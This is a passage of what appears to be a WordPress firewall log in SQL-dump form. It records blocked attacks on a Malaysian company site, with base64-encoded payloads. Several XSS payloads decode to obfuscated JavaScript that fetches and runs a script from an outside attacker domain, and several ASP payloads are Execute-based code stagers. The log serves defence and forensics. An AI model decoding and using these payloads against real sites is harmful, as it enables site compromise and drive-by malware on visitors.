0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTgsMTAxLDExNSw0Niw5OCwxMDEsMTA4LDk3LDExNiwxMDEsMTE0LDk4LDEwMSwxMTksOTcsMTE1LDExNiwxMDQsMTAxLDExNCwxMDEsNDYsOTksMTExLDEwOSw0Nyw5OSwxMTEsMTE0LDExMCw0NywxMDIsMTA4LDEwMSwxMjAsNDYsMTA2LDExNSw2MywxMTYsMTEyLDYxLDUyLDM5LDU5LDEwLDMyLDMyLDMyLDMyLDEwMCwxMTEsOTksMTE3LDEwOSwxMDEsMTEwLDExNiw0NiwxMDMsMTAxLDExNiw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiwxMTUsNjYsMTIxLDg0LDk3LDEwMyw3OCw5NywxMDksMTAxLDQwLDM0LDEwNCwxMDEsOTcsMTAwLDM0LDQxLDkxLDQ4LDkzLDQ2LDk3LDExMiwxMTIsMTAxLDExMCwxMDAsNjcsMTA0LDEwNSwxMDgsMTAwLDQwLDEwMSwxMDgsMTAxLDEwOSw0MSw1OSwxMCwzMiwzMiwxMjUsNDEsNDAsNDEsNTkpKT4+QHRlc3QuY29t\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37709,1569411902.844250,1569411901.496700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37710,1569411900.046814,1569411899.204900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37711,1569411897.749915,1569411896.895200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37925,0.000000,1570723986.539382,'\0\0\0\0\0\0\0\0\0\0ÿÿE.$',0,200,0,0,0,'https://bintara.com.my/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(37862,1569949944.995799,1569949943.692600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37861,1569949946.882256,1569949945.807300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37910,1570674415.746146,1570674414.871700,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5WyNd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37863,1569949942.778432,1569949941.178500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37606,1569410846.808291,1569410845.938600,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37911,1570674450.651006,1570674449.790800,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//base/admin/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9iYXNlL2FkbWluL2NhY2hlLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37912,1570674478.640195,1570674477.660800,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3lzaF0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37790,1569949682.376975,1569949681.019500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhY